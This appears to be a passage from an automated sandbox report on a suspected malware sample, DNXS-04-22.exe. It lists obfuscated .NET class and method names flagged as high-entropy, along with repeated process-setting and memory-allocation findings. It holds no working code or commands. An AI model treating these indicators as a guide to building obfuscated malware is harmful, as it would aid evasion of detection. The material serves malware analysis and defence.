Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, E3aakuxDxGKNoPVOUO.cs	High entropy of concatenated method names: 'RypgmBdVZh', 'BxQgOYY7Xn', 'ANSUTuCXBU', 'lAMU4wiEon', 'CcwUpvAsjD', 'sIHUyRpqJV', 'C69UdnuQJt', 'HA1UEDlE9p', 'APVUl4i5qX', 'QweUIGByav'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, cOXIyitFF2gaURLced.cs	High entropy of concatenated method names: 'JoOCjPop5Y', 'qUOCJi4TJA', 'vDCCgqQBXY', 'kYQCtxHR56', 'x0YCAcchlV', 'nJMguPL5ci', 'zCqg0VVddH', 'xFkgH0Uqd9', 'xMcg5T2IIy', 'MSwgfwOM67'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, ID8c9vQe98sjnu6ppA.cs	High entropy of concatenated method names: 'Dispose', 'hWhBfk3Sb8', 'DejV1uEQ0a', 'zVjSSZ2cpk', 'lTBBh264Fl', 'zYGBz7TPUv', 'ProcessDialogKey', 'sQFVG8ONIu', 'pcnVB8pU2N', 'r9cVV7HB55'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, maoXAfCsQBqkxEI3xi.cs	High entropy of concatenated method names: 'hGGq5vJ8b', 'YTIn16rZM', 'vsT7EkymJ', 'Fx5OS2VPv', 'dorwAgyMr', 'wNmseEWt4', 'hq7eEq4J96xvicdHmp', 'iSYt67h5mEWooMtAQn', 'qRLPd9bBy', 'GFqMxlATE'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, d5D6f6vXn5vtMWEjdQ.cs	High entropy of concatenated method names: 'kYAoIYrJyR', 'BRZoZ6trvT', 'gBEoijQDa2', 'cQ0o23SKwX', 'mQ1o1NPyZL', 'w24oTnoDRI', 'aGAo4MwEsL', 'YHmoptiMmi', 'iSvoydx0R8', 'ucVodsHgLR'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, cg8WfuymZA2IFj5JEe.cs	High entropy of concatenated method names: 'pKmDBjwOZV', 'd99DrFTEoO', 'mBiDcXWEKP', 'rKiDFGKeMV', 'LSEDJiuL7y', 'tVKDgRKwos', 'ltiDCEcEaK', 'MXOPHKuSYO', 'l2vP52xZaZ', 'ujbPfI6eFL'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, CdBy1uPOL3yTkn8gh7.cs	High entropy of concatenated method names: 'sYfBtg49uq', 'xBYBAk70fd', 'hMGBe4d1pX', 'JoaBWq3mNC', 'iZMBonb63b', 'owGB6t56o6', 'Tk4rs9Xy8dobZ1paKq', 'iMUvH0EeTyZNwv7KLi', 'xFcBBN2RFb', 'KZOBryKaHQ'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, uXUMPXzbUffKbh1iG7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cIoDRnyOU9', 'ClvDoX7rQM', 'FK0D6MtN8Q', 'UpYDbYidUp', 'WYdDPVos8j', 'OW6DDxH6Fa', 'SKyDMfOT3a'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, qFSrn8NrqaemYW4oQN.cs	High entropy of concatenated method names: 'SsfPvyD2k5', 'VRfP18Jqcp', 'vaYPT8bmqr', 'bPxP4TSTTS', 'tMiPinQNcX', 'fuGPp4VikC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, NAeXU2oB9ZWsnvpV5P.cs	High entropy of concatenated method names: 'xjAUn2gCik', 'ckpU7eLnQy', 'JTaUY8u4Ww', 'EHdUwk9WMZ', 'XDHUoPMecr', 'i4mU6JYRP3', 'otmUbWKh66', 'nbqUP3h537', 'tl4UDAqQLk', 'dwvUMZcHPw'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, d3TeAR2e5ZlrinSGbo.cs	High entropy of concatenated method names: 'yZitFildtm', 'vJLtU4b4GE', 'KSatCuPlLq', 'FpbChi2yuP', 'n0ZCzUIuK7', 'NQmtGaVN5U', 'i4utBUQtBR', 'fUCtVagAHi', 'VIbtrlrjPJ', 'b2ttcDIh4J'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, CERZe5WR9RL9k9ABZdL.cs	High entropy of concatenated method names: 't82Da1Bbs4', 'n81D8ss2kv', 'qkcDqvdcBp', 'V08DndV7sS', 'qekDmGNDjv', 'mRtD7ELLFA', 'o48DOG4mV4', 'RTCDYMKGcl', 'dVrDwu3G2S', 'KYSDs5Og50'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, moRgB8JqoMTtSLl43c.cs	High entropy of concatenated method names: 'sagbeKM1nk', 'KlVbWa22Ee', 'ToString', 't0PbFpUeHw', 'jN1bJkfr7M', 'snqbUb8vKE', 'hWubgmeIk4', 'bDNbClh1iX', 'zShbt8p94J', 'WxLbAsCjCd'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, tpytbaBWxv8XpfmZLI.cs	High entropy of concatenated method names: 'GdyRY6HxBf', 'Q7WRwhdmgD', 'sk4RvK8qEs', 'oVHR1TaTpB', 'hcqR4fP14b', 's7KRp7JsFJ', 'VWBRdlm9ep', 'r3cRE9A9HP', 'q9NRIA6JeJ', 'Qs4RN6CgW5'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	High entropy of concatenated method names: 'AWkrjMWy1b', 'X0orFLvXPt', 'WDKrJDJrlL', 'kDorUX209A', 'BjkrgnmxeX', 'OSCrCFGqlr', 'H8NrtviDQa', 'YLjrA49jTg', 'rrKrk8MrHn', 'IvareMCDLq'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, mY3IKt45gSW4nI9Ksv.cs	High entropy of concatenated method names: 'EFIJiV7440', 'eu7J2MSHwN', 'wY2JKkm7Jd', 'L84J3veLlY', 'WlXJu8niq8', 'CdFJ0Z8vsL', 'VSYJH3KMXY', 'B5XJ5F2QrJ', 'L84JfdI7f3', 'Q4DJheE8tc'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, yqw3GuW6RHgs1vp4r1O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iHbMillPWb', 't00M2IZqv5', 'ONsMKHiXkd', 'RtvM3TRBcp', 'm4HMuVyhgY', 'Y0GM0reuge', 'VXmMHUZnaX'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, TsdG8tus2h3ewMhpA4.cs	High entropy of concatenated method names: 'KQwb51HVYr', 'Hgmbho4PfQ', 'VPRPG481O0', 'O18PB6JwB1', 'z8ZbNrknnd', 'PCrbZI3iAT', 'r2CbXPrkFK', 'zBSbiAyKdX', 'yYTb20XUo1', 'iR3bKt8Y0g'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, nNpH8k8BSOkP33NmJX.cs	High entropy of concatenated method names: 'Tt3PFacLP2', 'dpnPJ0yJHF', 'wLaPUkAtcv', 'bkwPg1olZD', 'B4HPCZb6qR', 'shxPtq74Ln', 'DY1PAUqEhk', 'DwhPk3Gsof', 'rYNPeB84wJ', 'rLhPWOmEcv'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, T9Sffn1kEToq3rSGht.cs	High entropy of concatenated method names: 'i405KWRGZOF5235MvcC', 'MDmL61R7ynrQkVCLhRL', 'QRBfoMRVUupcQIbe379', 'bcxCP8Owuo', 'p15CDH4q38', 'fZTCMnhEis', 'g7F8q4RlwaVsNTq8SyJ', 'uXxbKuRj6G27TCpbsWh'
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, s9KQgomUYRDcyGLx3J.cs	High entropy of concatenated method names: 'ip8ta9Eteb', 'dsvt8SKY8p', 'lvvtqnmAdn', 'P8stnufJvf', 'kNNtmO0jou', 'nS1t7YRjIW', 'JmotOoUMwi', 'algtYM56b7', 'OWstwcGCGY', 'OJAtsWYKBe'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, E3aakuxDxGKNoPVOUO.cs	High entropy of concatenated method names: 'RypgmBdVZh', 'BxQgOYY7Xn', 'ANSUTuCXBU', 'lAMU4wiEon', 'CcwUpvAsjD', 'sIHUyRpqJV', 'C69UdnuQJt', 'HA1UEDlE9p', 'APVUl4i5qX', 'QweUIGByav'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, cOXIyitFF2gaURLced.cs	High entropy of concatenated method names: 'JoOCjPop5Y', 'qUOCJi4TJA', 'vDCCgqQBXY', 'kYQCtxHR56', 'x0YCAcchlV', 'nJMguPL5ci', 'zCqg0VVddH', 'xFkgH0Uqd9', 'xMcg5T2IIy', 'MSwgfwOM67'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, ID8c9vQe98sjnu6ppA.cs	High entropy of concatenated method names: 'Dispose', 'hWhBfk3Sb8', 'DejV1uEQ0a', 'zVjSSZ2cpk', 'lTBBh264Fl', 'zYGBz7TPUv', 'ProcessDialogKey', 'sQFVG8ONIu', 'pcnVB8pU2N', 'r9cVV7HB55'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, maoXAfCsQBqkxEI3xi.cs	High entropy of concatenated method names: 'hGGq5vJ8b', 'YTIn16rZM', 'vsT7EkymJ', 'Fx5OS2VPv', 'dorwAgyMr', 'wNmseEWt4', 'hq7eEq4J96xvicdHmp', 'iSYt67h5mEWooMtAQn', 'qRLPd9bBy', 'GFqMxlATE'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, d5D6f6vXn5vtMWEjdQ.cs	High entropy of concatenated method names: 'kYAoIYrJyR', 'BRZoZ6trvT', 'gBEoijQDa2', 'cQ0o23SKwX', 'mQ1o1NPyZL', 'w24oTnoDRI', 'aGAo4MwEsL', 'YHmoptiMmi', 'iSvoydx0R8', 'ucVodsHgLR'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, cg8WfuymZA2IFj5JEe.cs	High entropy of concatenated method names: 'pKmDBjwOZV', 'd99DrFTEoO', 'mBiDcXWEKP', 'rKiDFGKeMV', 'LSEDJiuL7y', 'tVKDgRKwos', 'ltiDCEcEaK', 'MXOPHKuSYO', 'l2vP52xZaZ', 'ujbPfI6eFL'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, CdBy1uPOL3yTkn8gh7.cs	High entropy of concatenated method names: 'sYfBtg49uq', 'xBYBAk70fd', 'hMGBe4d1pX', 'JoaBWq3mNC', 'iZMBonb63b', 'owGB6t56o6', 'Tk4rs9Xy8dobZ1paKq', 'iMUvH0EeTyZNwv7KLi', 'xFcBBN2RFb', 'KZOBryKaHQ'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, uXUMPXzbUffKbh1iG7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cIoDRnyOU9', 'ClvDoX7rQM', 'FK0D6MtN8Q', 'UpYDbYidUp', 'WYdDPVos8j', 'OW6DDxH6Fa', 'SKyDMfOT3a'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, qFSrn8NrqaemYW4oQN.cs	High entropy of concatenated method names: 'SsfPvyD2k5', 'VRfP18Jqcp', 'vaYPT8bmqr', 'bPxP4TSTTS', 'tMiPinQNcX', 'fuGPp4VikC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, NAeXU2oB9ZWsnvpV5P.cs	High entropy of concatenated method names: 'xjAUn2gCik', 'ckpU7eLnQy', 'JTaUY8u4Ww', 'EHdUwk9WMZ', 'XDHUoPMecr', 'i4mU6JYRP3', 'otmUbWKh66', 'nbqUP3h537', 'tl4UDAqQLk', 'dwvUMZcHPw'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, d3TeAR2e5ZlrinSGbo.cs	High entropy of concatenated method names: 'yZitFildtm', 'vJLtU4b4GE', 'KSatCuPlLq', 'FpbChi2yuP', 'n0ZCzUIuK7', 'NQmtGaVN5U', 'i4utBUQtBR', 'fUCtVagAHi', 'VIbtrlrjPJ', 'b2ttcDIh4J'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, CERZe5WR9RL9k9ABZdL.cs	High entropy of concatenated method names: 't82Da1Bbs4', 'n81D8ss2kv', 'qkcDqvdcBp', 'V08DndV7sS', 'qekDmGNDjv', 'mRtD7ELLFA', 'o48DOG4mV4', 'RTCDYMKGcl', 'dVrDwu3G2S', 'KYSDs5Og50'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, moRgB8JqoMTtSLl43c.cs	High entropy of concatenated method names: 'sagbeKM1nk', 'KlVbWa22Ee', 'ToString', 't0PbFpUeHw', 'jN1bJkfr7M', 'snqbUb8vKE', 'hWubgmeIk4', 'bDNbClh1iX', 'zShbt8p94J', 'WxLbAsCjCd'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, tpytbaBWxv8XpfmZLI.cs	High entropy of concatenated method names: 'GdyRY6HxBf', 'Q7WRwhdmgD', 'sk4RvK8qEs', 'oVHR1TaTpB', 'hcqR4fP14b', 's7KRp7JsFJ', 'VWBRdlm9ep', 'r3cRE9A9HP', 'q9NRIA6JeJ', 'Qs4RN6CgW5'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	High entropy of concatenated method names: 'AWkrjMWy1b', 'X0orFLvXPt', 'WDKrJDJrlL', 'kDorUX209A', 'BjkrgnmxeX', 'OSCrCFGqlr', 'H8NrtviDQa', 'YLjrA49jTg', 'rrKrk8MrHn', 'IvareMCDLq'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, mY3IKt45gSW4nI9Ksv.cs	High entropy of concatenated method names: 'EFIJiV7440', 'eu7J2MSHwN', 'wY2JKkm7Jd', 'L84J3veLlY', 'WlXJu8niq8', 'CdFJ0Z8vsL', 'VSYJH3KMXY', 'B5XJ5F2QrJ', 'L84JfdI7f3', 'Q4DJheE8tc'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, yqw3GuW6RHgs1vp4r1O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iHbMillPWb', 't00M2IZqv5', 'ONsMKHiXkd', 'RtvM3TRBcp', 'm4HMuVyhgY', 'Y0GM0reuge', 'VXmMHUZnaX'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, TsdG8tus2h3ewMhpA4.cs	High entropy of concatenated method names: 'KQwb51HVYr', 'Hgmbho4PfQ', 'VPRPG481O0', 'O18PB6JwB1', 'z8ZbNrknnd', 'PCrbZI3iAT', 'r2CbXPrkFK', 'zBSbiAyKdX', 'yYTb20XUo1', 'iR3bKt8Y0g'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, nNpH8k8BSOkP33NmJX.cs	High entropy of concatenated method names: 'Tt3PFacLP2', 'dpnPJ0yJHF', 'wLaPUkAtcv', 'bkwPg1olZD', 'B4HPCZb6qR', 'shxPtq74Ln', 'DY1PAUqEhk', 'DwhPk3Gsof', 'rYNPeB84wJ', 'rLhPWOmEcv'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, T9Sffn1kEToq3rSGht.cs	High entropy of concatenated method names: 'i405KWRGZOF5235MvcC', 'MDmL61R7ynrQkVCLhRL', 'QRBfoMRVUupcQIbe379', 'bcxCP8Owuo', 'p15CDH4q38', 'fZTCMnhEis', 'g7F8q4RlwaVsNTq8SyJ', 'uXxbKuRj6G27TCpbsWh'
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, s9KQgomUYRDcyGLx3J.cs	High entropy of concatenated method names: 'ip8ta9Eteb', 'dsvt8SKY8p', 'lvvtqnmAdn', 'P8stnufJvf', 'kNNtmO0jou', 'nS1t7YRjIW', 'JmotOoUMwi', 'algtYM56b7', 'OWstwcGCGY', 'OJAtsWYKBe'
Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 8240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 9240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 9410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: A410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
